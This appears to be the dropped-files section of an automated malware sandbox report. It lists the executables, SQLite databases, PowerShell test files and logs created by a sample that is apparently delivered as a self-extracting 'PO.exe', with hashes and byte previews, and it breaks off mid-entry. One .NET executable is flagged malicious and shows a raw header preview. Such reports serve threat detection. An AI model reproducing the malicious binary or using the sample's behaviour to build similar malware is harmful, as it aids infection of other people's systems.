                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\4d760e3e4675c4a4c66b64205fb0d001\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\17470ef0c7a174f38bdcadacc3e310ad\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:CSV text
                      Category:dropped
                      Size (bytes):1968
                      Entropy (8bit):5.345338934370444
                      Encrypted:false
                      SSDEEP:48:MxHKlYHKh3ouHgJHreylEHMHKo/tHo6hAHKzeRHKx1qHxvj:iqlYqh3ou0aymsqwtI6eqzqqxwRb
                      MD5:A6AE821E85EB04F10E67C9D65E129C47
                      SHA1:8B3295F40A2F7DCA294DE5502CFE6A751239DB2C
                      SHA-256:BD5DE47C737626F6A162CDFE9476DE310476B56FAF917092DF2D9CD4059A6A41
                      SHA-512:22E2404E8D989DC1F58B209B48A2BD0AFFA0E19B09100C3FD8417A8A23EBA109A36AF7031CAE33F8FF5BD798F01F81ACA129D90801B34A9607C2D62A63C643DD
                      Malicious:false
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\4d760e3e4675c4a4c66b64205fb0d001\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\17470ef0c7a174f38bdcadacc3e310ad\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:modified
                      Size (bytes):2232
                      Entropy (8bit):5.380805901110357
                      Encrypted:false
                      SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//Z8vUyus:lGLHyIFKL3IZ2KRH9Ouggs
                      MD5:B171BCCDDA0A76C24B6654C5D4CF3B80
                      SHA1:E1012D8FA07FC3BF4E00342EB9E94A5C83C8B8BD
                      SHA-256:C9854D03D91051DA649CC5880DE7848FEF51ACE5B4B5E399272A851AB1A317B2
                      SHA-512:F40CC9DDE5DCB432D2D0F4C1B641624F5B90EABC185BFA8558891F3977F38B63C6E226AB140B18DF8A70BB86F8B15878DE5B60CB35F31CA241F1755687A19E24
                      Malicious:false
                      Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                      Process:C:\Users\user\Desktop\owKQ0b029a.exe
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):550920
                      Entropy (8bit):7.891666015031055
                      Encrypted:false
                      SSDEEP:12288:13QfYVK+orvWdcjjs0OzZgN3RV7ib0KnggidUzxF7+wdIbH2TdTkR:81+PejtrN3G0UdiSzxgw+bSM
                      MD5:8A9837F38BD2C2ADDA21106E3B75FFA8
                      SHA1:D03BC9129AEB9AF731AFD9FD676487592C48FC5B
                      SHA-256:FDB3927EBECB2D7611D047BE77C913E6848D24D87EC24D84D76E851839D2FADB
                      SHA-512:AC938FFF9572A37A2FB801999FE7A2EE9DC72CE0FB4A4878AA2EF2676E76477AAEB9F6A248B92682425F3DFC911835B757C688FF8DEB5A48AA92CFDBB03161CD
                      Malicious:true
                      Antivirus:
                      • Antivirus: Avira, Detection: 100%
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 83%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2.f..............0..............1... ...@....@.. ....................................@.................................P1..O....@...............2...6...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......0..............@..B.................1......H........z...f..........h....O..........................................b.(.....(.....s!...}....*.*J..{....o....(....*J..{....o....(....*J..{....o....(....*J..{....o....(....*J..{....o....(....*J..{....o....(....*J..{....o....(....*J..{....o....(....*J..{....o....(....*J..{....o....(....*J..{....o....(....*F.{....r...po....*F.{....r...po....*F.{....r!..po....*F.{....r3..po....*..{....o ....{.....{....o....o....*..{.....o....&.{.....{....o....o....*.0...........o.............o
                      Process:C:\Users\user\Desktop\owKQ0b029a.exe
                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, progressive, precision 8, 390x552, components 3
                      Category:dropped
                      Size (bytes):49161
                      Entropy (8bit):7.9640442162988965
                      Encrypted:false
                      SSDEEP:768:LWTHytOtCeYfsfd8HAeA5Sz8Q3X1taN5adCKWEnMAyk8n/syo:qTj7Yfsfd8Ha5Sz/nHaN5adrlYsf
                      MD5:E83CCB51EE74EFD2A221BE293D23C69A
                      SHA1:4365CA564F7CDD7337CF0F83AC5FD64317FB4C32
                      SHA-256:DA931852A19A707D01C3EDF138622B8601056C42525F8AC40CB48AF43A7410CC
                      SHA-512:0252E629FBDAFDB66FF63EF76D18F25D1CA46AC3EFF019F012361DB45EBD34D1A7A9AD35F7A2FC5830676C771997633F3ABF1DC3224BD8F6BD55456B0A554A46
                      Malicious:false
                      Preview:......JFIF.....`.`.....C....................................................................C.......................................................................(...."................................................................................`...4....0CI.#..!..i..`..!..i..`..!..i..`..!..i..`..!..i..`....f.....8q.+..k...8..............\4..V^..._....o.....S..6......C?......../.;..G.~...J}fw..o.).B..S~..l..o...?|.]...'/...@...7...+.........>..}#..7.......n....+4_.......c].;....J%Ye}....c.3...-..O..[y.!../@......f.....0....#p....|u.2.Yc[.%v.[.?..P.=K..D.,z.zN.......(...._Qv..i.........7...+..l.doY.z.E...%7..._.6..sU.;k-.:K.H.i.Y.........B...Q...IZ..SR..R........U..0y.&l^.}...X.3Q.s3..#=.....].6&...Z6..i...e"K..&C...<...>....?..........-%...\;p.....7_..............:r..B.8....p...4...[.eN..e.P...+.^......bB..Y...>?l.wIlr.KG.L..`.....$z..FTu....`....u.{.@.......4.iK.OQ.......R-.(.g?%...................>;F......L+d.......m.S.+`...h3.v#.a.P.......
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
